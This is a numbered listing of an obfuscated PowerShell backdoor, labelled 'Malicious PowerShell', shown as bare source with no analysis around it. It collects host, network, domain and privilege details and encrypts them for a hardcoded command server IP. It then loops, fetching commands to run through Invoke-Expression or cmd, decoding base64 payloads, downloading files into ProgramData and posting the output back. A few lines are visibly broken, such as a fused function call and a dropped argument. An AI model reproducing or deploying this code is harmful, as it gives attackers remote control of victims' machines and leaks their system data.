Malicious PowerShell

1. $global:url = ""
2. $global:id = ""
3. $cevingr = 959,713
4. $choyvp = 37,437
5. $C = @('http://162.223.89.53')
6.  
7. function Zbq ($x,$H,$n) {
8.   $Xi = $x
9.   $Ei = $H
10.   $Yi = 1
11.   while ($Ei -gt 0) {
12.     if (($Ei % 2) -eq 0)
13.     {
14.       $Xi = ($Xi * $Xi) % $n
15.       $Ei = $Ei / 2
16.     } else
17.     {
18.       $Yi = ($Xi * $Yi) % $n
19.       $Ei = $Ei - 1
20.     }
21.   }
22.   return $Yi
23. }
24.  
25. function raPelcg ($pk,$cynvagrkg) {
26.   try {
27.     $xrl,$n = $pk;
28.     $zlneenl = @();
29.     for ($i = 0; $i -lt $cynvagrkg.Length; $i++)
30.     {
31.       $ahz = [int][char]$cynvagrkg[$i]
32.       $t = Zbq $ahz $xrl $n
33.       $zlneenl += $t
34.     }
35.     return $zlneenl
36.   }
37.   catch
38.   {
39.     trgEnaqbzCebkl
40.   }
41. }
42.  
43. function qrPelcg ($pk,$pvcuregrkg) {
44.   try {
45.     $xrl,$n = $pk;
46.     $zl_neenl = @();
47.     for ($i = 0; $i -lt $pvcuregrkg.Length; $i++) {
48.       $ahz = [int]$pvcuregrkg[$i]
49.       $t = Zbq $ahz $xrl $n
50.       $zl_neenl += [convert]::ToChar([int]$t)
51.     }
52.     return -join $zl_neenl
53.   }
54.   catch { trgEnaqbzCebkl }
55. }
56.  
57. function uggcCBFG ($hey,$rap_zft) {
58.   trgEnaqbzCebkl
59.   try {
60.     $pbagrag = $rap_zft
61.     $jroerd = [System.Net.WebRequest]::Create($global:url + $hey);
62.     $jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy()
63.     $jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials
64.     $rapbqr_qngn = [System.Text.Encoding]::UTF8.GetBytes($pbagrag);
65.     $jroerd.Method = "POST";
66.     $jroerd.ContentLength = $rapbqr_qngn.Length;
67.     $jroerd.ContentType = "application/json"
68.     if ($rapbqr_qngn.Length -gt 0)
69.     { $erd_fgernz = $jroerd.GetRequestStream();
70.       $erd_fgernz.Write($rapbqr_qngn,0,$rapbqr_qngn.Length); }
71.     [System.Net.WebResponse]$erfc = $jroerd.GetResponse();
72.     if ($erfc -ne $null) { $qngn = $erfc.GetResponseStream(); [System.IO.StreamReader]$erf_qngn = New-Object System.IO.StreamReader $qngn; [string]$erfhyg = $erf_qngn.ReadToEnd(); } }
73.   catch {
74.     $erfhyg = "error"
75.     Write-Host $hey "`t" ($global:url + $_.Exception.Message)
76.     trgEnaqbzCebkl
77.     Start-Sleep (Get-Random -Minimum 20 -Maximum 40) }
78.   return $erfhyg }
79.  
80. function uggcTRG ($hey) {
81.   trgEnaqbzCebkltry { $jroerd = [System.Net.WebRequest]::Create($global:url + $hey);
82.     $jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy()
83.     $jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials
84.     $jroerd.Method = "GET"; [System.Net.WebResponse]
85.     $erfc = $jroerd.GetResponse();
86.     if ($erfc -ne $null) { $qngn = $erfc.GetResponseStream(); [System.IO.StreamReader]$erf_qngn = New-Object System.IO.StreamReader $qngn; [string]$erfhyg = $erf_qngn.ReadToEnd(); } } catch { $erfhyg = "error"
87.     Write-Host $hey "`t" ($global:url + $_.Exception.Message)
88.     trgEnaqbzCebkl
89.     Start-Sleep (Get-Random -Minimum 20 -Maximum 40) } return $erfhyg }
90.  
91. function fuggcTRG ($hey) {
92.   try { $jroerd = [System.Net.WebRequest]::Create($hey);
93.     $jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy()
94.     $jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials
95.     $jroerd.Method = "GET";
96.     [System.Net.WebResponse]$erfc = $jroerd.GetResponse();
97.     if ($erfc -ne $null) { $qngn = $erfc.GetResponseStream();
98.       [System.IO.StreamReader]$erf_qngn = New-Object System.IO.StreamReader $qngn;
99.       [string]$erfhyg = $erf_qngn.ReadToEnd(); } } catch {
100.     $erfhyg = "" }
101.   return $erfhyg
102. }
103.  
104. function Riny ($pzq) {
105.   try {
106.     $bhg = Invoke-Expression $pzq -ErrorAction SilentlyContinue
107.     if ($pzq.StartsWith("cd"))
108.     {
109.       $bhg = $PWD;
110.     }
111.     $bhg = ($bhg | Out-String)
112.   } catch
113.   { $bhg = $_.Exception.Message }
114.   return $bhg
115. }
116.  
117. function vasbvavg () {
118.   function trgVC () { try { $vcf = ""
119.       Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "IPEnabled=True" | Where-Object { $_.IPAddress[0] -notlike '169*' } | ForEach-Object { $vcf = $vcf + "-" + $_.IPAddress[0] }
120.       return $vcf.substring(1); }
121.     catch { return "ErrorIP"; } }
122.   function trgBF () { try { return (Get-WmiObject Win32_OperatingSystem).Name; } catch { return "ErrorOS"; } }
123.   function trgNepu () { try { return (Get-WmiObject Win32_OperatingSystem).OSArchitecture; } catch { return "ErrorArch"; } }
124.   function trgQbznva () { try { return (Get-WmiObject Win32_ComputerSystem).Domain; } catch { return "ErrorDomain"; } }
125.   function trgUbfgAnzr () { try { return (Get-WmiObject Win32_ComputerSystem).Name; } catch { return "ErrorHostName"; } }
126.   function trgHfreanzr () { try { try {
127.         $sfb = New-Object -ComObject Scripting.FileSystemObject;
128.         $hfre = $env:UserName
129.         $ghfre = $hfre.Replace('[^a-zA-Z0-9]','')
130.         if ($ghfr -eq $hfre) {
131.           return $hfre
132.         }
133.         return ($sfb.getfolder('c:\\users\\' + $env:UserName).ShortName)
134.       } catch {
135.         return $env:UserName
136.       }
137.     } catch
138.     { return "-" }
139.   }
140.   function vfNqzva () { try {
141.       $JvaqbjfVqragvgl = [System.Security.Principal.WindowsIdentity]::GetCurrent()
142.       $Cevapvcny = New-Object System.Security.Principal.WindowsPrincipal ($JvaqbjfVqragvgl)
143.       $NqzvaEbyr = [System.Security.Principal.WindowsBuiltInRole]::Administrator
144.       if ($Cevapvcny.IsInRole($NqzvaEbyr))
145.       { return '+' }
146.       else { return '' } }
147.     catch { return "" } }
148.   function trgCVC () { try {
149.       $ernyVC = fuggcTRG "http://ipv4bot.whatismyipaddress.com/"
150.       return $ernyVC
151.     } catch {
152.       return "ErrorPublicIP" } }
153.   $FlfVasb = trgBF
154.   $FlfVasb += "**"
155.   $FlfVasb += trgVC
156.   $FlfVasb += "**"
157.   $FlfVasb += trgNepu
158.   $FlfVasb += "**"
159.   $FlfVasb += trgUbfgAnzr
160.   $FlfVasb += "**"
161.   $FlfVasb += trgQbznva
162.   $FlfVasb += "**"
163.   $FlfVasb += vfNqzva
164.   $FlfVasb += trgHfreanzr
165.   $FlfVasb += "**"
166.   $FlfVasb += trgCVC
167.   $global:id = zq5trarengbe ($FlfVasb)
168.   return ($global:id + '**' + $FlfVasb) }
169.  
170. function zq5trarengbe ($fgeVa)
171. { $zq5 = New-Object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider
172.   $hgs8 = New-Object -TypeName System.Text.UTF8Encoding
173.   $unfu = [System.BitConverter]::ToString($zq5.ComputeHash($hgs8.GetBytes($fgeVa)))
174.   $bhgchg = $unfu.Replace('-','')
175.   return $bhgchg }
176.  
177. function pbzznaq_naq_pbageby ($pzq) { try {
178.     if ($pzq.StartsWith('upload')) { try {
179.         $pzq = $pzq.Replace('upload ','')
180.         $wc = New-Object System.Net.WebClient
181.         $wc.proxy = [Net.WebRequest]::GetSystemWebProxy()
182.         $wc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials
183.         $wc.DownloadFile($pzq,("c:\programdata\" + $pzq.substring($pzq.LastIndexOf('/'),$pzq.Length - $pzq.LastIndexOf('/'))))
184.         return Riny "pwd" } catch {
185.         return $_.Exception.Message } }
186.     elseif ($pzq.StartsWith('cmd')) {
187.       $pzq = $pzq.Replace('cmd ','')
188.       try { $bhg = cmd /c $pzq
189.         $bhg = $bhg | Out-String
190.         return $bhg } catch {
191.         return $_.Exception.Message } }
192.     elseif ($pzq.StartsWith('b64')) { $pzq = $pzq.Replace('b64 ','')
193.       try {
194.         $pzq = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($pzq))
195.         $bhg = Riny $pzq
196.         $bhg = $bhg | Out-String
197.         return $bhg } catch {
198.         return $_.Exception.Message } } else { return Riny $pzq } } catch { return $_.Exception.Message } }
199.  
200. function trgEnaqbzCebkl () {
201. $eaq = Get-Random -Minimum 0 -Maximum ($C.Length)
202. $global:url = $C[$eaq]
203. }
204.  
205. function ertChfu ([string]$p,[string]$k,[string]$v) { try { New-ItemProperty -Path $p -Name $k -Value $v -Force -ErrorAction SilentlyContinue | Out-Null } catch { return "error" } }
206.  
207. function ertvfgre () { while ($true) { Write-Host "R-I"
208.     $vasb = vasbvavg
209.     $vasb = raPelcg $cevingr $vasb
210.     $vasb = ('{"data":"' + $vasb + '"}')
211.     $vasb = uggcCBFG ("/oa/")
212.     $vasb
213.     if ($vasb -eq '"done"') { break } else { Start-Sleep 30 } Write-Host "R-O" } }
214.    
215.    
216. ertvfgre
217. while ($true) {
218.   Write-Host "W-I"
219.   try { $pzq = uggcTRG ("/oc/api/?t=" + $global:id)
220.     if ($pzq.Length -gt 0) {
221.       $pzq = $pzq.substring(1,$pzq.Length - 2)
222.       $pzq = $pzq -split "~~!!~~"
223.       $pvq = $pzq[0]
224.       $pzq = $pzq[1]
225.       $erfhyg = pbzznaq_naq_pbageby $pzq
226.       if ($erfhyg.Length -le 1)
227.       {
228.         $erfhyg = "NULL"
229.       }
230.       $erfhyg = [Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes($erfhyg))
231.       $erfhyg = ($pvq + ':' + $erfhyg)
232.       $nqqe = ('/or/?t=' + $global:id)
233.       $qngn = ('{"data":"' + $erfhyg + '"}')
234.       $erfhyg = uggcCBFG $nqqe $qngn
235.     }
236.   }
237.   catch {
238.   trgEnaqbzCebkl
239.   continue
240.   }
241.   Write-Host "W-O" Start-Sleep 300 }